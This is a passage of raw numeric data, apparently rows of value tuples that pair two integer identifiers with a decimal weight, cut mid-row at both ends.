110,26873,0.88669),(110,26874,1.07331),(110,26875,0.93331),(110,26876,1.14331),(110,26877,0.23331),(110,26878,0.88669),(110,26879,1.12),(110,27103,1.07331),(110,27104,0.93331),(110,27105,1.00331),(110,27106,0.93331),(110,27107,1.05),(110,27108,1.02669),(110,27109,1.26),(110,27110,0.88669),(110,27111,0.95669),(110,27112,2.58993),(110,27113,1.91338),(110,27114,1.07331),(110,27115,0.91),(110,27116,1.00331),(110,27117,0.84),(110,27118,1.09669),(110,27119,0.84),(110,27120,1.05),(110,27121,0.91),(110,27122,1.09669),(110,27123,0.93331),(110,27124,1.19),(110,27125,0.56007),(110,27126,0.88669),(110,27127,1.14331),(110,27128,1.72662),(110,27129,0.95669),(110,27130,0.95669),(110,27131,0.46662),(110,27132,0.91),(110,27133,1.14331),(110,27134,1.00331),(110,27135,1.14331),(110,27136,0.46662),(110,27137,1.00331),(110,27138,1.09669),(110,27139,1.02669),(110,27140,1.09669),(110,27141,0.51331),(110,27142,1.07331),(110,27143,1.21331),(110,27144,0.28),(126,27144,0.28),(110,27145,0.91),(110,27146,1.12),(110,27147,2.52),(110,27148,1.16669),(110,27149,1.23669),(110,27150,1.00331),(110,27151,1.21331),(110,27152,1.07331),(110,27153,1.19),(110,27154,1.09669),(110,27155,1.35331),(110,27156,1.14331),(110,27157,1.33),(110,27158,0.98),(110,27159,1.12),(110,27160,0.28),(110,27161,0.93331),(110,27162,1.02669),(110,27163,0.37331),(110,27164,0.98),(110,27165,1.09669),(110,27166,0.98),(110,27167,0.37331),(110,27168,0.95669),(110,27169,1.02669),(110,27170,0.93338),(110,27171,1.21331),(110,27172,1.4),(110,27173,1.02669),(110,27174,1.23669),(110,27175,0.46669),(110,27176,1.05),(110,27177,1.14331),(110,27178,1.05),(110,27179,1.12),(110,27180,1.86662),(110,27181,1.00331),(110,27182,1.07331),(110,27183,0.98),(110,27184,1.12),(110,27185,0.28),(110,27186,1.00331),(110,27187,1.16669),(110,27188,0.28),(110,27189,0.91),(110,27190,1.00331),(110,27191,1.00331),(110,27192,1.09669),(110,27193,0.51331),(110,27194,1.07331),(110,27195,1.28331),(110,27196,1.12),(110,27197,1.23669),(110,27198,0.95669),(110,27199,1.14331),(110,27200,0.93331),(110,27201,1.02669),(110,27202,0.95669),(110,27203,1.02669),(110,27204,0.32669),(110,27205,0.93331),(110,27206,1.02669),(110,27207,0.95669),(110,27208,1.05),(110,27209,0.14),(125,27209,0.14),(111,27209,0.42),(110,27210,0.95669),(125,27210,0.95669),(111,27210,2.87007),(110,27211,1.09669),(110,27212,0.18669),(110,27213,0.86331),(110,27214,1.16669),(110,27215,0.28),(110,27216,0.91),(110,27217,1.00331),(119,27218,0.18669),(110,27218,0.37338),(120,27218,0.37338),(110,27219,0.93331),(110,27220,1.05),(110,27221,0.86331),(110,27222,1.02669),(110,27223,0.93331),(110,27224,1.05),(110,27225,1.05),(110,27226,1.19),(111,29582,0.21),(111,29583,0.93331),(111,29584,1.05),(111,30677,1.77338),(111,30678,0.98),(111,30679,0.98),(111,30680,0.81669),(111,30681,1.09669),(111,30682,1.07331),(111,30683,1.28331),(111,30684,0.23331),(111,30685,0.88669),(111,30686,1.05),(111,30836,0.37324),(111,30837,0.81669),(111,30838,0.95669),(111,30839,0.93331),(111,30840,1.07331),(111,30841,0.88669),(111,30842,1.02669),(111,30843,0.86331),(111,30844,1.02669),(111,30845,0.86331),(111,30846,0.91),(111,30847,1.02669),(111,30848,1.28331),(111,30849,1.72662),(111,30850,0.93331),(111,30851,1.07331),(111,30852,0.91),(111,30853,1.09669),(111,30854,0.86331),(111,30855,0.91),(111,30856,0.84),(111,30857,1.09669),(111,30858,1.02669),(111,30859,1.09669),(111,30860,0.98),(111,30861,1.05),(111,30862,1.05),(111,30863,1.19),(111,30864,0.98),(111,30865,1.02669),(111,30866,0.93331),(111,30867,1.12),(111,30868,0.88669),(111,30869,0.98),(111,30870,0.98),(111,30871,1.12),(111,30872,0.95669),(111,30873,1.00331),(111,30874,0.42),(111,30875,1.02669),(111,30876,1.16669),(111,30877,0.37331),(111,30878,0.98),(111,30879,1.16669),(111,30880,0.56),(111,30881,0.91),(111,30882,1.07331),(111,30883,0.95669),(111,30884,1.16669),(111,30885,1.00331),(113,30885,1.00331),(121,30885,1.00331),(128,30885,1.00331),(111,30886,1.23669),(111,30887,0.98),(111,30888,1.05),(111,30889,0.37331),(111,30890,0.95669),(111,30891,1.09669),(111,30892,0.84),(111,30893,0.95669),(111,30894,1.05),(111,30895,1.02669),(111,30896,1.26),(111,30897,0.98),(111,30898,1.33),(111,30899,0.98),(111,30900,1.02669),(111,30901,0.93331),(111,30902,1.09669),(111,30903,0.88669),(111,30904,0.98),(111,30905,0.88669),(111,30906,1.05),(111,30907,0.28),(111,30908,0.91),(111,30909,1.02669),(111,30910,0.23331),(111,30911,0.95669),(111,30912,1.26),(111,30913,0.28),(111,30914,0.84),(111,30915,0.98),(111,30916,0.98),(111,30917,1.07331),(111,30918,0.23331),(111,30919,0.95669),(111,30920,1.16669),(111,30921,0.74662),(111,30922,0.98),(111,30923,1.16669),(111,30924,1.05),(111,30925,1.23669),(111,30926,0.32669),(111,30927,0.93331),(111,30928,1.14331),(111,30929,0.09331),(111,30930,1.07331),(111,30931,1.16669),(111,30932,0.32669),(111,30933,0.95669),(111,30934,1.09669),(111,30935,0.32669),(111,30936,0.95669),(111,30937,1.00331),(111,30938,0.42),(111,30939,0.95669),(111,30940,1.09669),(111,30941,1.05),(111,30942,1.12),(111,30943,0.23331),(111,30944,0.91),(111,30945,1.05),(111,30946,0.09331),(111,30947,0.84),(111,30948,0.91),(111,30949,0.28),(111,30950,0.95669),(111,30951,1.02669),(111,30952,0.18669),(111,30953,0.95669),(111,30954,1.05),(111,30955,1.16669),(111,30956,1.07331),(111,30957,1.14331),(111,30958,0.84),(111,30959,0.91),(111,30960,0.32669),(111,30961,1.09669),(111,30962,1.16669),(111,30963,0.69993),(111,30964,0.93331),(111,30965,1.02669),(111,30966,0.98),(111,30967,1.12),(111,30968,0.98),(111,30969,1.21331),(111,30970,3.36),(111,30971,1.00331),(111,30972,1.14331),(111,30973,0.98),(111,30974,1.05),(111,30975,0.95669),(111,30976,1.09669),(111,30977,1.00331),(111,30978,1.12),(111,30979,1.09669),(111,30980,1.19),(111,30981,1.00331),(111,30982,1.19),(111,30983,1.14331),(111,30984,1.19),(111,30985,1.05),(111,30986,1.21331),(111,30987,0.42),(111,30988,1.05),(111,30989,1.30669),(112,32713,0.93331),(112,32714,1.00331),(112,32715,0.98),(112,32716,1.12),(112,32717,1.02669),(112,32718,1.12),(112,32719,0.88669),(112,32720,0.95669),(112,32721,0.37331),(112,32722,1.05),(112,32723,1.16669),(112,32724,0.28),(112,32725,0.93331),(112,32726,1.05),(112,32727,0.88669),(112,32728,1.12),(112,32729,0.93331),(112,32730,1.05),(112,32731,0.88669),(112,32732,1.00331),(112,32733,0.86331),(112,32734,1.00331),(112,32735,0.18669),(120,32735,0.18669),(125,32735,0.18669),(112,32736,0.93331),(112,32737,1.00331),(112,32738,0.23331),(112,32739,0.91),(112,32740,1.07331),(112,32741,0.86331),(112,32742,1.05),(112,32743,0.95669),(112,32744,1.07331),(112,32745,0.91),(112,32746,0.98),(112,32747,0.81669),(112,32748,0.93331),(112,32749,0.81669),(112,32750,0.88669),(112,32751,0.86331),(112,32752,0.95669),(112,32753,0.93331),(112,32754,1.05),(112,32755,0.84),(112,32756,1.00331),(112,32757,0.37331),(112,32758,0.98),(112,32759,1.05),(112,32760,1.09669),(112,32761,1.14331),(112,32762,0.32669),(112,32763,0.98),(112,32764,1.12),(112,32857,0.23331),(112,32858,0.88669),(112,32859,1.12),(112,32860,1.07331),(120,32861,0.18669),(126,32861,0.18669),(112,32861,0.37338),(123,32861,1.12014),(112,32862,0.93331),(112,32863,1.00331),(112,32864,0.98),(112,32865,1.12),(112,32866,0.74662),(112,32867,1.05),(112,32868,1.16669),(112,32869,1.05),(112,32870,1.12),(112,32871,0.28),(112,32872,1.05),(112,32873,1.12),(112,32874,1.86662),(112,32875,2.19338),(112,32876,1.00331),(112,32877,1.14331),(112,32878,0.93331),(112,32879,1.09669),(112,32880,1.00331),(112,32881,1.09669),(112,32882,0.46669),(120,32882,0.46669),(112,32883,1.12),(112,32884,1.28331),(112,32885,0.28),(126,32885,0.28),(112,32886,0.91),(112,32887,1.00331),(112,32888,0.91),(112,32889,0.95669),(112,32890,0.98),(112,32891,1.16669),(112,32892,0.28),(112,32893,0.93331),(112,32894,1.19),(112,32895,0.32669),(112,32896,1.05),(112,32897,1.14331),(112,32898,0.32669),(112,32899,0.95669),(112,32900,1.02669),(128,33967,0.37331),(113,33967,0.74662),(113,33968,0.95669),(113,33969,1.07331),(113,33970,1.09669),(113,33971,1.26),(113,33972,0.28),(128,33972,0.28),(113,33973,0.91),(113,33974,1.00331),(113,33975,0.91),(113,33976,1.02669),(113,33977,0.74676),(113,33978,0.95669),(113,33979,1.02669),(113,33980,0.95669),(113,33981,1.14331),(113,33982,0.91),(113,33983,1.07331),(113,33984,0.93331),(113,33985,1.02669),(113,33986,0.93331),(128,33986,0.93331),(113,33987,1.09669),(128,33987,1.09669),(113,33988,0.23331),(119,33988,0.23331),(113,33989,0.93331),(113,33990,1.05),(113,33991,0.86331),(113,33992,0.91),(113,33993,0.91),(113,33994,1.00331),(113,33995,0.98),(113,33996,1.09669),(113,33997,0.28),(128,33997,0.28),(113,33998,1.12),(128,33998,1.12),(113,33999,1.21331),(128,34000,1.63345),(113,34000,3.59359),(113,34001,1.07331),(113,34002,1.14331),(113,34003,0.95669),(113,34004,1.05),(113,34005,1.05),(113,34006,1.16669),(113,34007,0.95669),(113,34008,1.05),(113,34009,0.98),(113,34010,1.23669),(113,34011,2.05338),(113,34012,1.19),(113,34013,1.16669),(113,34014,1.02669),(128,34014,1.02669),(113,34015,1.23669),(113,34016,1.02669),(113,34017,1.16669),(113,34018,0.93331),(113,34019,1.02669),(113,34020,1.00331),(128,34020,2.00662),(113,34021,1.09669),(113,34022,0.23331),(113,34023,0.88669),(113,34024,1.00331),(113,34025,1.26),(113,34026,1.00331),(113,34027,1.12),(113,34028,1.05),(113,34029,1.21331),(113,34030,1.02669),(113,34031,1.14331),(113,34032,0.95669),(113,34033,1.09669),(113,34113,0.95669),(128,34113,0.95669),(113,34114,1.12),(128,34114,1.12),(113,34115,1.12),(113,34116,1.28331),(113,34117,1.91338),(113,34118,1.09669),(113,34119,1.09669),(113,34120,1.96),(113,34121,1.12),(113,34122,1.14331),(113,34123,1.00331),(113,34124,1.12),(128,34125,1.96),(113,34125,3.92),(128,34126,2.28662),(113,34126,3.42993),(113,34127,1.02669),(113,34128,1.00331),(113,34129,1.05),(113,34130,0.93331),(113,34131,1.07331),(113,34132,0.98),(113,34133,1.21331),(113,34134,1.05),(113,34135,1.26),(113,34136,1.91338),(113,34137,1.12),(113,34138,1.12),(113,34139,1.00331),(128,34139,1.00331),(113,34140,1.28331),(128,34140,1.28331),(128,34141,2.05338),(113,34141,5.13345),(113,34142,1.12),(113,34143,1.21331),(113,34144,1.12),(113,34145,1.14331),(113,34146,1.16669),(128,34146,2.33338),(113,34147,1.09669),(113,34148,3.08007),(113,34149,2.24),(113,34150,1.21331),(128,34151,3.82676),(113,34151,6.69683),(128,34152,4.48),(113,34152,7.84),(128,34153,1.86662),(113,34153,4.66655),(128,34154,1.96),(113,34154,4.9),(128,34155,1.91338),(113,34155,6.69683),(128,34156,1.14331),(113,34156,3.42993),(113,34157,1.12),(113,34158,1.14331),(113,34159,1.09669),(113,34160,1.14331),(113,34161,1.23669),(113,34162,1.19),(113,34163,1.07331),(128,34163,1.07331),(113,34164,2.19338),(113,34165,1.07331),(113,34166,1.09669),(113,34167,1.14331),(113,34168,1.09669),(113,34169,1.05),(128,34169,2.1),(113,34170,1.16669),(128,34170,1.16669),(113,34171,2.14662),(113,34172,1.07331),(128,34172,1.07331),(113,34173,1.14331),(128,34173,1.14331),(128,34174,4.48),(113,34174,6.72),(113,34175,1.09669),(113,34176,1.09669),(128,34176,1.09669),(113,34177,1.16669),(113,34178,1.12),(113,34179,1.96),(113,34180,2.14662),(128,34181,1.02669),(113,34181,3.08007),(113,34182,1.12),(128,34182,1.12),(113,34183,1.16669),(113,34184,1.16669),(128,34185,1.02669),(113,34185,2.05338),(113,34186,1.16669),(113,34187,1.16669),(128,34187,1.16669),(113,34188,2.00662),(113,34189,1.09669),(113,34190,1.14331),(113,34191,1.96),(128,34191,1.96),(113,34192,2.14662),(128,34192,2.14662),(113,34193,2.00662),(128,34193,3.00993),(113,34194,1.05),(113,34195,1.09669),(128,34195,1.09669),(113,34196,2.94),(128,34196,2.94),(113,34197,3.36),(128,34197,3.36),(113,34198,3.08007),(113,34199,3.57),(128,34200,1.05),(113,34200,2.1),(113,34201,1.16669),(113,34202,1.19),(128,34203,2.94),(113,34203,4.9),(113,34204,1.16669),(128,34204,1.16669),(128,34205,2.05338),(113,34205,4.10676),(113,34206,4.01324),(128,34206,4.01324),(113,34207,1.19),(128,34207,1.19),(113,34208,1.19),(113,34209,1.14331),(113,34210,1.21331),(128,34210,2.42662),(113,34211,0.91),(113,34212,1.09669),(113,34213,0.84),(113,34214,0.95669),(113,34215,0.91),(113,34216,1.05),(113,34217,0.28),(113,34218,0.98),(113,34219,1.21331),(113,34220,0.32669),(113,34221,0.95669),(113,34222,1.07331),(128,34223,4.78345),(113,34223,6.69683),(128,34224,1.05),(113,34224,2.1),(113,34225,3.21993),(128,34225,3.21993),(128,34226,1.12),(113,34226,2.24),(113,34227,0.98),(113,34228,1.91338),(114,35473,0.91),(114,35474,1.00331),(114,35475,1.00331),(114,35476,1.14331),(114,35477,0.32669),(114,35478,0.91),(114,35479,1.16669),(114,35480,0.09331),(114,35481,0.93331),(114,35482,1.05),(114,35483,0.23331),(114,35484,1.02669),(114,35485,1.12),(114,35544,0.93331),(114,35545,0.98),(114,35546,0.42),(114,35547,0.95669),(114,35548,1.19),(114,35549,1.00331),(114,35550,1.09669),(114,35551,0.88669),(114,35552,0.93331),(114,35553,0.91),(114,35554,1.00331),(114,35555,0.18669),(114,35556,0.93331),(114,35557,1.14331),(114,35558,0.98),(114,35559,1.19),(114,35560,1.00331),(114,35561,1.21331),(114,35562,0.91),(114,35563,1.07331),(114,35564,0.91),(114,35565,1.09669),(114,35566,1.07331),(114,35567,1.19),(114,35568,0.98),(114,35569,1.02669),(114,35570,0.95669),(114,35571,1.02669),(114,35572,0.91),(114,35573,1.02669),(114,35574,0.93331),(114,35575,0.98),(114,35576,0.18669),(114,35577,0.86331),(114,35578,1.00331),(117,36424,0.18669),(120,36424,0.18669),(117,36427,0.84),(123,36434,0.91),(116,37270,0.91),(116,37271,0.98),(116,37272,0.98),(116,37273,1.09669),(116,37274,1.07331),(116,37275,1.14331),(116,37320,0.18669),(116,37321,0.86331),(116,37322,1.12),(116,37323,1.05),(116,37324,1.00331),(116,37325,0.98),(116,37326,1.05),(120,37327,0.32669),(126,37327,0.32669),(116,37327,0.65338),(116,37328,0.95669),(116,37329,1.00331),(116,37330,1.05),(116,37331,1.14331),(116,37332,0.98),(116,37333,1.14331),(116,37334,0.18669),(116,37335,1.00331),(116,37336,1.09669),(117,38174,1.05),(117,38175,1.21331),(117,38176,0.23331),(117,38177,0.93331),(117,38178,1.09669),(117,38179,0.91),(117,38180,1.00331),(117,38181,0.86331),(117,38182,0.98),(117,38183,0.88669),(117,38184,0.95669),(117,38185,0.98),(117,38186,1.16669),(117,38187,0.88669),(117,38188,1.05),(117,38189,0.93331),(117,38190,0.98),(117,38191,1.77338),(117,38192,1.00331),(117,38193,1.12),(117,38194,0.46669),(117,38195,1.16669),(117,38196,1.23669),(117,38197,0.32669),(117,38198,1.12),(117,38199,1.4),(117,38200,1.68),(117,38201,1.00331),(117,38202,1.14331),(117,38203,0.98),(117,38204,1.07331),(117,38205,1.05),(117,38206,1.12),(117,38207,1.02669),(117,38208,1.14331),(117,38209,0.46669),(117,38210,1.05),(117,38211,1.12),(117,38212,0.86331),(117,38213,1.00331),(117,38214,1.14331),(117,38215,1.23669),(117,38345,0.88669),(117,38346,0.98),(117,38347,0.23331),(117,38348,0.93331),(117,38349,1.02669),(117,38350,0.28),(117,38351,1.12),(117,38352,1.21331),(117,38353,1.02669),(117,38354,1.16669),(117,38355,0.91),(117,38356,1.07331),(117,38357,1.28331),(117,38358,1.12),(117,38359,1.05),(117,38360,0.32669),(121,38360,0.32669),(117,38361,0.98),(117,38362,1.09669),(117,38363,1.02669),(117,38364,1.09669),(117,38365,0.98),(117,38366,0.86331),(117,38367,0.95669),(117,38368,0.86331),(117,38369,0.98),(117,38370,0.93331),(117,38371,1.00331),(117,38372,0.88669),(117,38373,1.07331),(117,38374,0.23331),(117,38375,0.91),(117,38376,1.05),(117,38377,0.37331),(117,38378,0.95669),(117,38379,1.14331),(117,38380,0.91),(117,38381,1.02669),(117,38382,0.91),(117,38383,0.98),(117,38384,0.86331),(117,38385,0.91),(117,38386,1.02669),(117,38387,1.21331),(117,38388,0.95669),(117,38389,0.18669),(117,38390,0.88669),(117,38391,0.98),(117,38392,0.23331),(117,38393,0.93331),(117,38394,1.07331),(118,39354,0.98),(118,39355,0.88669),(118,39356,0.95669),(118,39357,0.98),(118,39358,1.12),(118,39359,0.91),(118,39360,0.98),(118,39361,1.05),(118,39362,1.14331),(118,39421,0.28),(118,39422,0.95669),(118,39423,1.02669),(118,39424,0.14),(118,39425,0.95669),(118,39426,1.09669),(118,39427,0.93331),(118,39428,1.05),(118,39429,0.95669),(118,39430,1.09669),(118,39431,0.37331),(118,39432,1.05),(118,39433,1.21331),(118,39434,0.95669),(118,39435,1.07331),(118,39436,1.00331),(118,39437,1.21331),(118,39438,0.88669),(118,39439,1.19),(118,39440,0.98),(118,39441,1.05),(118,39442,0.86331),(118,39443,0.91),(118,39444,0.23331),(118,39445,0.88669),(118,39446,0.98),(118,39447,0.95669),(118,39448,1.14331),(118,39449,1.00331),(118,39450,0.18669),(118,39451,0.86331),(118,39452,1.00331),(119,40318,0.93331),(119,40319,1.05),(119,40320,1.00331),(119,40321,1.21331),(119,40322,1.02669),(119,40323,1.09669),(119,40324,0.88669),(119,40325,1.02669),(119,40326,0.98),(119,40327,0.91),(119,40328,1.02669),(119,40329,1.02669),(119,40330,0.95669),(119,40331,1.14331),(119,40332,0.86331),(119,40333,1.05),(119,40334,0.91),(119,40335,1.05),(119,40336,0.84),(119,40337,0.91),(119,40338,0.86331),(120,40338,0.86331),(125,40338,0.86331),(119,40339,1.07331),(119,40340,0.95669),(119,40341,1.07331),(119,40342,0.98),(119,40343,1.02669),(119,40344,0.93331),(119,40345,1.00331),(119,40346,1.02669),(119,40347,1.21331),(119,40348,0.86331),(119,40349,0.93331),(119,40350,1.02669),(119,40351,1.16669),(119,40352,0.91),(119,40353,1.07331),(119,40354,0.46669),(119,40355,1.05),(119,40356,1.14331),(119,40357,0.95669),(126,40357,2.87007),(119,40358,1.14331),(119,40359,0.28),(119,40360,1.07331),(119,40361,1.14331),(119,40362,0.88669),(119,40363,1.05),(119,40364,0.84),(119,40365,0.93331),(119,40366,0.84),(119,40367,0.93331),(119,40368,0.84),(119,40369,0.95669),(119,40370,0.88669),(119,40371,1.05),(119,40372,1.77338),(119,40373,0.98),(119,40374,1.07331),(119,40375,0.91),(119,40376,1.00331),(119,40377,0.91),(119,40378,1.07331),(119,40379,1.05),(119,40380,1.14331),(119,40381,1.00331),(119,40382,1.09669),(119,40383,0.93331),(119,40384,1.05),(119,40385,1.11993),(119,40386,1.00331),(119,40387,1.21331),(119,40388,1.05),(119,40389,1.14331),(119,40390,1.09669),(119,40391,1.30669),(119,40392,0.18669),(119,40393,0.88669),(119,40394,1.02669),(119,40484,0.93331),(119,40485,1.05),(119,40486,0.91),(120,40486,0.91),(119,40487,1.05),(119,40488,0.28),(119,40489,1.00331),(119,40490,1.19),(119,40491,0.91),(119,40492,1.12),(119,40493,0.18669),(120,40493,0.37338),(119,40494,0.88669),(119,40495,0.98),(119,40496,0.14),(119,40497,0.98),(119,40498,1.09669),(119,40499,0.37338),(119,40500,0.88669),(119,40501,1.00331),(119,40502,0.98),(119,40503,1.09669),(119,40504,0.28),(119,40505,1.02669),(119,40506,1.12),(119,40507,0.23331),(123,40507,0.23331),(119,40508,0.95669),(119,40509,1.07331),(119,40510,0.23331),(123,40510,0.23331),(119,40511,0.93331),(119,40512,1.23669),(119,40513,0.88669),(119,40514,1.02669),(119,40515,0.84),(119,40516,0.93331),(120,41838,0.88669),(120,41839,1.00331),(120,41840,0.88669),(120,41841,0.95669),(120,41842,0.28),(120,41843,0.95669),(120,41844,1.05),(120,41845,0.28),(120,41846,0.95669),(120,41847,1.00331),(120,41848,0.88669),(120,41849,0.98),(120,41850,1.09669),(120,41851,1.19),(120,41852,0.88669),(120,41853,1.00331),(120,41854,1.00331),(120,41855,1.09669),(120,41856,0.18669),(120,41857,0.86331),(120,41858,1.02669),(120,41859,1.07331),(120,41860,0.91),(120,41861,1.00331),(120,41862,0.98),(120,41863,1.12),(120,41864,1.02669),(120,41865,1.21331),(120,41866,1.02669),(120,41867,1.07331),(120,41868,0.84),(120,41869,0.88669),(120,41870,1.02669),(120,41871,1.14331),(120,41872,1.77338),(120,41873,0.93331),(120,41874,1.12),(120,41875,0.88669),(120,41876,1.00331),(120,41877,0.86331),(126,41877,0.86331),(120,41878,0.98),(120,41879,0.88669),(120,41880,1.02669),(120,41881,0.91),(120,41882,1.00331),(120,41883,0.93331),(120,41884,1.02669),(120,41885,0.95669),(120,41886,1.09669),(120,41887,0.93331),(120,41888,0.93331),(120,41889,1.00331),(120,41890,0.95669),(120,41891,1.05),(120,41892,1.02669),(120,41893,0.86331),(120,41894,0.98),(120,41895,0.18669),(120,41896,0.91),(120,41897,1.05),(120,41898,0.91),(120,41899,1.00331),(120,41900,0.86331),(120,41901,1.09669),(120,41902,0.86331),(120,41903,1.07331),(120,41904,1.05),(120,41905,1.14331),(120,41906,0.91),(120,41907,0.98),(120,41908,0.88669),(120,41909,1.02669),(120,41910,0.91),(120,41911,1.14331),(120,41912,1.00331),(120,41913,1.21331),(120,41914,0.95669),(120,41915,1.07331),(120,41916,0.98),(120,41917,1.16669),(120,41918,1.09669),(120,41919,1.21331),(120,41920,0.93331),(120,41921,1.07331),(120,41922,0.88669),(120,41923,1.05),(120,41924,0.91),(120,41925,1.02669),(120,41926,0.95669),(120,41927,1.16669),(120,41928,0.88669),(120,41929,0.98),(120,41930,0.18669),(126,41930,0.18669),(120,41931,0.86331),(120,41932,0.98),(120,41933,0.28),(120,41934,0.91),(120,41935,1.00331),(120,42095,0.84),(120,42096,0.98),(120,42097,1.07331),(120,42098,1.07331),(120,42099,1.26),(120,42100,0.93331),(120,42101,1.05),(120,42102,1.02669),(120,42103,1.14331),(120,42104,1.07331),(120,42105,1.21331),(120,42106,1.82),(120,42107,1.00331),(120,42108,1.02669),(120,42109,0.18669),(125,42109,0.18669),(120,42110,0.93331),(120,42111,1.09669),(120,42112,0.95669),(120,42113,1.05),(120,42114,1.05),(120,42115,1.07331),(120,42116,1.14331),(120,42117,0.42),(120,42118,1.00331),(120,42119,1.09669),(120,42120,0.86331),(120,42121,1.00331),(120,42122,1.05),(120,42123,0.14),(120,42124,0.84),(120,42125,0.88669),(120,42126,0.88669),(120,42127,1.12),(120,42128,1.02669),(120,42129,1.09669),(120,42130,0.32669),(120,42131,1.05),(120,42132,1.14331),(120,42133,0.91),(120,42134,0.98),(120,42135,0.95669),(120,42136,1.09669),(120,42137,0.86331),(120,42138,1.19),(120,42139,1.09669),(120,42140,1.26),(120,42141,0.95669),(120,42142,1.09669),(120,42143,0.91),(120,42144,0.98),(120,42145,0.95669),(120,42146,1.07331),(120,42147,0.98),(120,42148,1.05),(120,42149,0.95669),(120,42150,0.95669),(120,42151,1.07331),(120,42152,0.23331),(120,42153,0.95669),(120,42154,1.30669),(120,42155,0.86331),(120,42156,1.05),(120,42157,0.88669),(120,42158,1.00331),(120,42159,0.14),(120,42160,0.84),(120,42161,1.02669),(120,42162,0.42),(120,42163,1.14331),(120,42164,1.23669),(121,43252,0.56),(121,43253,1.07331),(121,43254,1.16669),(121,43255,2.00662),(121,43256,1.30669),(121,43257,1.21331),(121,43258,1.07331),(121,43259,0.88669),(121,43260,0.95669),(121,43261,2.8),(121,43262,3.2666),(121,43263,0.28),(121,43264,1.02669),(121,43265,1.09669),(121,43266,0.51331),(121,43267,1.00331),(121,43268,1.16669),(123,44844,0.93331),(123,44845,2.05338),(123,44846,0.95669),(123,44847,0.91),(123,44848,1.07331),(123,44849,0.84),(123,44850,1.09669),(123,44851,1.23669),(123,44852,0.98),(123,44853,1.12),(123,44854,1.00331),(123,44855,1.09669),(123,44856,0.65338),(123,44857,0.95669),(123,44858,1.05),(123,44859,1.02669),(123,44860,1.12),(123,44861,1.02669),(123,44862,0.88669),(123,44863,1.07331),(123,44864,0.95669),(123,44865,1.09669),(123,44866,0.98),(123,44867,1.21331),(123,44868,0.42),(123,44869,1.00331),(123,44870,1.23669),(123,44871,0.95669),(123,44872,1.14331),(123,44873,1.19),(123,44953,0.28),(123,44954,1.00331),(123,44955,1.12),(123,44956,0.18669),(123,44957,0.93331),(123,44958,1.12),(123,44959,1.07331),(123,44960,1.19),(123,44961,0.91),(123,44962,1.12),(123,44963,1.07331),(123,44964,1.14331),(123,44965,1.91338),(123,44966,1.02669),(123,44967,1.07331),(123,44968,0.98),(123,44969,1.23669),(123,44970,0.88669),(123,44971,1.05),(123,44972,0.18669),(123,44973,0.95669),(123,44974,1.16669),(123,44975,0.14),(123,44976,0.91),(123,44977,1.02669),(126,44978,0.28),(128,44978,0.28),(123,44978,0.84),(123,44979,0.91),(123,44980,1.00331),(123,44981,0.95669),(123,44982,1.07331),(123,44983,0.91),(123,44984,1.02669),(123,44985,0.65338),(123,44986,2.1),(123,44987,1.14331),(123,44988,1.21331),(123,44989,0.23331),(123,44990,0.91),(123,44991,1.07331),(123,44992,0.95669),(123,44993,1.14331),(123,44994,0.91),(123,44995,1.00331),(123,44996,0.42),(123,44997,1.05),(123,44998,1.28331),(123,44999,1.00331),(123,45000,1.05),(123,45001,1.23669),(123,45002,0.88669),(123,45003,1.05),(125,47705,0.98),(125,47706,1.16669),(125,47707,0.86331),(125,47708,0.98),(125,47709,0.93331),(125,47710,0.93331),(125,47711,1.02669),(125,47712,0.98),(125,47713,0.88669),(125,47714,1.00331),(125,47715,1.09669),(125,47716,0.88669),(125,47717,1.00331),(125,47718,0.18669),(125,47719,1.00331),(125,47720,1.12),(125,47721,0.18669),(125,47722,0.86331),(125,47723,0.91),(125,47724,0.84),(125,47725,0.95669),(125,47726,0.86331),(125,47727,0.95669),(125,47728,0.84),(125,47729,0.91),(125,47730,0.28),(125,47731,0.98),(125,47732,1.16669),(125,47733,0.18669),(125,47734,0.91),(125,47735,1.16669),(125,47736,0.23331),(125,47737,0.88669),(125,47738,1.02669),(125,47739,0.88669),(125,47740,0.98),(125,47805,0.91),(125,47806,0.91),(125,47807,1.05),(125,47808,0.95669),(125,47809,1.05),(125,47810,0.32669),(125,47811,0.93331),(125,47812,1.09669),(125,47813,0.84),(125,47814,0.91),(125,47815,0.37331),(125,47816,1.00331),(125,47817,1.09669),(125,47818,0.28),(125,47819,0.93331),(125,47820,1.05),(125,47821,0.86331),(125,47822,0.98),(125,47823,0.95669),(125,47824,1.12),(125,47825,0.86331),(125,47826,1.00331),(125,47827,1.09669),(126,48669,0.93331),(126,48670,0.98),(126,48671,0.69993),(126,48672,1.00331),(126,48673,1.05),(126,48674,1.00331),(126,48675,1.16669),(126,48676,0.23331),(126,48677,0.91),(126,48678,1.02669),(126,48679,0.88669),(126,48680,1.14331),(126,48681,1.00331),(126,48682,0.93331),(126,48683,0.95669),(126,48684,1.02669),(126,48685,1.02669),(126,48686,1.26),(126,48687,0.93331),(126,48688,1.12),(126,48689,1.05),(126,48690,1.14331),(126,48691,0.46669),(126,48692,1.02669),(126,48693,1.14331),(126,48694,2.42662),(126,48695,1.12),(126,48696,0.28),(126,48697,1.05),(126,48698,1.16669),(126,48699,0.86331),(126,48700,1.00331),(126,48701,0.56),(126,48702,2.1),(126,48703,1.21331),(126,48704,1.26),(126,48705,0.91),(126,48706,1.00331),(126,48707,0.37331),(126,48708,0.95669),(126,48709,1.19),(126,48710,0.18669),(126,48711,0.86331),(126,48712,1.02669),(126,48713,0.42),(126,48714,1.05),(126,48715,1.12),(126,48783,0.74662),(126,48784,1.05),(126,48785,1.14331),(126,48786,1.09669),(126,48787,1.19),(126,48788,0.95669),(126,48789,1.09669),(126,48790,0.95669),(126,48791,1.02669),(126,48792,0.98),(126,48793,1.16669),(126,48794,0.91),(126,48795,0.98),(126,48796,1.00331),(126,48797,1.12),(126,48798,0.95669),(126,48799,1.02669),(126,48800,0.93331),(126,48801,1.21331),(126,48802,0.18662),(126,48803,2.00662),(126,48804,1.14331),(126,48805,1.19),(126,48806,0.18669),(126,48807,0.93331),(126,48808,1.07331),(128,51379,0.95669),(128,51380,1.05),(128,51381,1.00331),(128,51382,1.09669),(128,51383,0.88669),(128,51384,1.02669),(128,51385,1.00331),(128,51386,1.09669),(128,51387,0.95669),(128,51388,1.23669),(128,51389,0.91),(128,51390,1.05),(128,51391,1.28331),(128,51392,1.26),(128,51393,1.07331),(128,51394,1.21331),(128,51395,1.07331),(128,51396,1.12),(128,51397,1.12),(128,51398,1.12),(128,51399,0.55986),(128,51400,0.81669),(128,51401,0.91),(128,51402,1.68),(128,51403,0.95669),(128,51404,1.09669),(128,51405,0.86331),(128,51406,1.00331),(128,51407,0.95669),(128,51408,1.12),(